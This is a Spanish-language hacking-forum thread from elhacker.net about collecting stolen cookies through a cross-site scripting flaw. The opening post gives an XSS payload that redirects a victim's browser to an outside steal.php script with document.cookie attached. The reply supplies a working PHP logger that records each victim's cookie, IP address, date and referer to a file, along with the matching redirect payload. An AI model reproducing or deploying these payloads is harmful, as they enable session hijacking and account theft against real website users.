elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Problemas con reenvío de cookies.. en XSS vulnerable.		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problemas con reenvío de cookies.. en XSS vulnerable.  (Leído 2,814 veces)
Blixx

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Problemas con reenvío de cookies.. en XSS vulnerable.
« en: 5 Agosto 2006, 11:23 am »
Hola.. en un escenario típico donde una página es vulnerable a rediregir los navegadores, con el código:
Código:
<script>window.location=site.com/steal.php?cookie='+document.cookie;</script>

para que luego steal.php grabe la variable cookie.. con el contenido de la cookie en un archivo log.txt digamos.. Pero ahora.. qué sitio permite grabar el texto, con la información obtenida? Es decir, la mayoría de servidores gratuitos no otorgan permiso de escritura en sus archivos..

Habría alguna forma alternativa.. de quizás, enviar el valor de 'cookie' usando steal.php.. pero a algún correo por ejemplo? O usando POST /formulario?=cookie.. Desde dónde podría ver el archivo que registra el steal.php que contiene $cookie = $_GET['cookie'];?
« Última modificación: 5 Agosto 2006, 11:25 am por Blixx » En línea
ifcaro

Desconectado Desconectado

Mensajes: 42



Ver Perfil WWW
Re: Problemas con reenvío de cookies.. en XSS vulnerable.
« Respuesta #1 en: 6 Agosto 2006, 23:14 pm »
Yo en mi servidor de www.wwwpuntocom.com use este codigo y si m funciono:

guarda la variable ?c= en el archivo steal.php

Código:
//cookies.php
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'   <br>
IP: ' .$ip. ' <br>
Date and Time: ' .$date. '   <br>
Referer: '.$referer.' <br><br>');
fclose($fp);
?>

usa el codigo
Código:
<script>window.location=site.com/cookies.php?c='+document.cookie;</script>
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas con las Cookies en PHP
PHP 		Sinedra 1 2,796 Último mensaje 18 Febrero 2011, 23:59 pm
por ~ Yoya ~
bat reenvio de archivos « 1 2 »
Scripting 		bela lugosi 10 5,105 Último mensaje 22 Agosto 2013, 08:22 am
por bela lugosi
reenvío de log con logger
GNU/Linux 		young0320 0 1,587 Último mensaje 11 Noviembre 2013, 16:14 pm
por young0320
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines